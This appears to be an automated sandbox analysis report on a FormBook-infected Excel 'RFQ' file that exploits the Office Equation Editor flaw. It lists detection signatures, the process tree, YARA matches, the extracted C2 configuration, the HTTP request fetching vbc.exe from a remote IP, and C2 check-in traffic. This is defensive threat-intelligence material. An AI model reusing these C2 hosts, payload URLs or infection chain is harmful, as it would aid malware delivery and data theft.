Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report (RFQ) No.109050.xlsx

Overview

General Information

Sample Name:(RFQ) No.109050.xlsx
Analysis ID:483690
MD5:34cc835409afb805f20b811796d3b1fd
SHA1:90b0fe9c48bb9915e2202e905baa3029ebc6f541
SHA256:bb916fab1615d4fab5ba566bd01d7d89eb13c586d8ece170b556f7fc8437658c
Tags:FormbookVelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1256 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2916 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2028 cmdline: 'C:\Users\Public\vbc.exe' MD5: A3F424F32B637CB917E6596FAE56E401)
      • vbc.exe (PID: 1292 cmdline: C:\Users\Public\vbc.exe MD5: A3F424F32B637CB917E6596FAE56E401)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • raserver.exe (PID: 2920 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 0842FB9AC27460E2B0107F6B3A872FD5)
            • cmd.exe (PID: 3044 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.afishin.com/r48a/"], "decoy": ["xyhsky.com", "gervitahomecare.net", "themanibox.com", "fb-swap-sales-item.club", "westbigsimple.com", "parentingwithpower.com", "dermanddoses.com", "corpmat.com", "pochakonkatu.com", "greenbeardcreative.com", "lianhuang.net", "metalcrow.jewelry", "abayti.com", "cthongkong.com", "lantekautomation.com", "suenospremonitorios.website", "tuningyan.xyz", "thorntonbrothersconcretefl.com", "chsbubblybar.com", "leben-mit-alzheimer.net", "a3dente.store", "aubergetoitrouge.com", "zoomaremote.com", "dabanse.info", "why-vote.com", "aashvigroup.com", "norfild.com", "amcon.mobi", "limbiks.com", "bestmubai.com", "protechub.com", "dashentsolserver.com", "familydoctorrecruitment.com", "ahistudio.com", "307baymavi.com", "grem75.com", "guidetouring.com", "xdg.cool", "bayatecc.com", "boxtobookshelf.com", "abogadosgl.com", "cubeoracle.com", "hunnyslove.com", "aerocrewpk.com", "balanceonewellness.com", "darrenshoponline.com", "almarufisa.com", "jasonsmorgan.com", "itorisuujuku.com", "tclrmnc.com", "hansel-design.com", "youresolush.com", "montageafricalifestyle.com", "conversoo.com", "gainesvillewineshop.com", "wildeuk.com", "thevendorplug.com", "ratteng.com", "chixiangkj.com", "m-fasting.com", "ojaih20.com", "best-product24.com", "ecoxax.com", "89800456.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x166a9:$sqlite3step: 68 34 1C 7B E1
      • 0x167bc:$sqlite3step: 68 34 1C 7B E1
      • 0x166d8:$sqlite3text: 68 38 2A 90 C5
      • 0x167fd:$sqlite3text: 68 38 2A 90 C5
      • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
      • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
      00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        Click to see the 24 entries

        Sigma Overview

        Exploits:

        barindex
        Sigma detected: EQNEDT32.EXE connecting to internetShow sources
        Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 198.12.84.109, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2916, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
        Sigma detected: File Dropped By EQNEDT32EXEShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2916, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

        System Summary:

        barindex
        Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
        Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2916, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2028
        Sigma detected: Execution from Suspicious FolderShow sources
        Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2916, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2028

        Jbx Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.afishin.com/r48a/"], "decoy": ["xyhsky.com", "gervitahomecare.net", "themanibox.com", "fb-swap-sales-item.club", "westbigsimple.com", "parentingwithpower.com", "dermanddoses.com", "corpmat.com", "pochakonkatu.com", "greenbeardcreative.com", "lianhuang.net", "metalcrow.jewelry", "abayti.com", "cthongkong.com", "lantekautomation.com", "suenospremonitorios.website", "tuningyan.xyz", "thorntonbrothersconcretefl.com", "chsbubblybar.com", "leben-mit-alzheimer.net", "a3dente.store", "aubergetoitrouge.com", "zoomaremote.com", "dabanse.info", "why-vote.com", "aashvigroup.com", "norfild.com", "amcon.mobi", "limbiks.com", "bestmubai.com", "protechub.com", "dashentsolserver.com", "familydoctorrecruitment.com", "ahistudio.com", "307baymavi.com", "grem75.com", "guidetouring.com", "xdg.cool", "bayatecc.com", "boxtobookshelf.com", "abogadosgl.com", "cubeoracle.com", "hunnyslove.com", "aerocrewpk.com", "balanceonewellness.com", "darrenshoponline.com", "almarufisa.com", "jasonsmorgan.com", "itorisuujuku.com", "tclrmnc.com", "hansel-design.com", "youresolush.com", "montageafricalifestyle.com", "conversoo.com", "gainesvillewineshop.com", "wildeuk.com", "thevendorplug.com", "ratteng.com", "chixiangkj.com", "m-fasting.com", "ojaih20.com", "best-product24.com", "ecoxax.com", "89800456.com"]}
        Multi AV Scanner detection for submitted fileShow sources
        Source: (RFQ) No.109050.xlsxReversingLabs: Detection: 34%
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORY
        Antivirus detection for URL or domainShow sources
        Source: http://www.afishin.com/r48a/?c6Al7=LxhAJNTZvxcDVsFYS6bCkMlCl8flV20C1M37CH6Gh+RPID4ASUQUpkYPhbv5Ge3pJAOGnQ==&Pj=-ZPHurVh_0pD5T7Avira URL Cloud: Label: malware
        Source: www.afishin.com/r48a/Avira URL Cloud: Label: malware
        Machine Learning detection for dropped fileShow sources
        Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJoe Sandbox ML: detected
        Source: 7.2.vbc.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen

        Exploits:

        barindex
        Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
        Source: Binary string: RAServer.pdb^ source: vbc.exe, 00000007.00000002.518168401.00000000002A0000.00000040.00020000.sdmp
        Source: Binary string: wntdll.pdb source: vbc.exe, raserver.exe
        Source: Binary string: RAServer.pdb source: vbc.exe, 00000007.00000002.518168401.00000000002A0000.00000040.00020000.sdmp
        Source: global trafficDNS query: name: www.hansel-design.com
        Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi7_2_00415679
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop edi9_2_00095679
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.12.84.109:80
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.12.84.109:80
        Source: excel.exeMemory has grown: Private usage: 4MB later: 69MB

        Networking:

        barindex
        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 34.102.136.180:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 34.102.136.180:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 34.102.136.180:80
        System process connects to network (likely due to code injection or exploit)Show sources
        Source: C:\Windows\explorer.exeDomain query: www.corpmat.com
        Source: C:\Windows\explorer.exeNetwork Connect: 34.98.99.30 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 144.217.61.66 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.boxtobookshelf.com
        Source: C:\Windows\explorer.exeDomain query: www.hansel-design.com
        Source: C:\Windows\explorer.exeDomain query: www.aubergetoitrouge.com
        Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 75.2.89.208 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.afishin.com
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorURLs: www.afishin.com/r48a/
        Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
        Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
        Source: global trafficHTTP traffic detected: GET /r48a/?c6Al7=wC1czlHtHJOIwEvZ4PQX06BQ8ZOMJ62w8+xsTz2Q4T7E2YSNIqqm4eyJ4Ejs7FpYzdcNqA==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1Host: www.aubergetoitrouge.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /r48a/?c6Al7=2Rzi8Yj6/Bi01eAfEHjBLqabwXtDDeMENe5GOpaDyE7pCbPj3uZiRxLvQfHvYqc4eHnj6w==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1Host: www.corpmat.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /r48a/?c6Al7=LxhAJNTZvxcDVsFYS6bCkMlCl8flV20C1M37CH6Gh+RPID4ASUQUpkYPhbv5Ge3pJAOGnQ==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1Host: www.afishin.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /r48a/?c6Al7=1TE2uVNv4WkqZ5wK9+DvX2X79O/td5E/IwUCAhT3ylibUknoNf4NSKzNJLQ49MPyx4kq0g==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1Host: www.boxtobookshelf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: Joe Sandbox ViewIP Address: 198.12.84.109 198.12.84.109
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 15 Sep 2021 09:41:57 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.22Last-Modified: Wed, 15 Sep 2021 04:42:06 GMTETag: "83800-5cc0151fdab7b"Accept-Ranges: bytesContent-Length: 538624Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 85 c9 dd 9e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 2e 08 00 00 08 00 00 00 00 00 00 6a 4d 08 00 00 20 00 00 00 60 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 4d 08 00 4f 00 00 00 00 60 08 00 f4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 08 00 0c 00 00 00 fc 4c 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 2d 08 00 00 20 00 00 00 2e 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f4 05 00 00 00 60 08 00 00 06 00 00 00 30 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 08 00 00 02 00 00 00 36 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c 4d 08 00 00 00 00 00 48 00 00 00 02 00 05 00 90 3f 00 00 1c 5f 01 00 03 00 00 00 6f 00 00 06 ac 9e 01 00 50 ae 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7e 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 2a b6 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 02 03 7d 02 00 00 04 02 04 7d 03 00 00 04 2a 00 00 13 30 02 00 4f 00 00 00 00 00 00 00 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 02 03 7b 01 00 00 04 7d 01 00 00 04 02 03 7b 05 00 00 04 7d 05 00 00 04 02 03 7b 06 00 00 04 7d 06 00 00 04 02 03 7b 07 00 00 04 7d 07 00 00 04 2a 3a 00 02 7b 04 00 00 04 28 16 00 00 0a 00 2a 00 00 13 30 03 00 77 00 00 00 01 00 00 11 00 03 17 52 02 7b 01 00 00 04 0b 07 0a 06 2c 66 06 72 01 00 00 70 28 17 00 00 0a 2d 29 06 72 21 00 00 70 28 17 00 00 0a 2d 25 06 72 2d 00 00 70 28 17 00 00 0a 2d 25 06 72 39 00 00 70 28 17 00 00 0a 2d 25 2b 30 02 17 7d 08 00 00 04 2b 27 04 04 4a 02 7b 07 00 00 04 58 54 2b 1a 04 04 4a 0
        Source: global trafficHTTP traffic detected: GET /cmd/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.84.109Connection: Keep-Alive
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: unknownTCP traffic detected without corresponding DNS query: 198.12.84.109
        Source: explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
        Source: explorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
        Source: explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
        Source: explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
        Source: explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
        Source: explorer.exe, 00000008.00000000.482122813.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
        Source: explorer.exe, 00000008.00000000.482122813.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
        Source: explorer.exe, 00000008.00000000.489205136.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
        Source: explorer.exe, 00000008.00000000.482845859.0000000003E50000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
        Source: explorer.exe, 00000008.00000000.482122813.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
        Source: explorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
        Source: explorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
        Source: explorer.exe, 00000008.00000000.482122813.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
        Source: explorer.exe, 00000008.00000000.489205136.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
        Source: explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
        Source: 45F1FF87.emf.0.drString found in binary or memory: http://www.day.com/dam/1.0
        Source: explorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
        Source: explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
        Source: explorer.exe, 00000008.00000000.482122813.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
        Source: explorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
        Source: explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
        Source: explorer.exe, 00000008.00000000.495009195.0000000008433000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
        Source: explorer.exe, 00000008.00000000.495009195.0000000008433000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
        Source: explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
        Source: explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
        Source: explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
        Source: explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\45F1FF87.emfJump to behavior
        Source: unknownDNS traffic detected: queries for: www.hansel-design.com
        Source: global trafficHTTP traffic detected: GET /cmd/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.84.109Connection: Keep-Alive
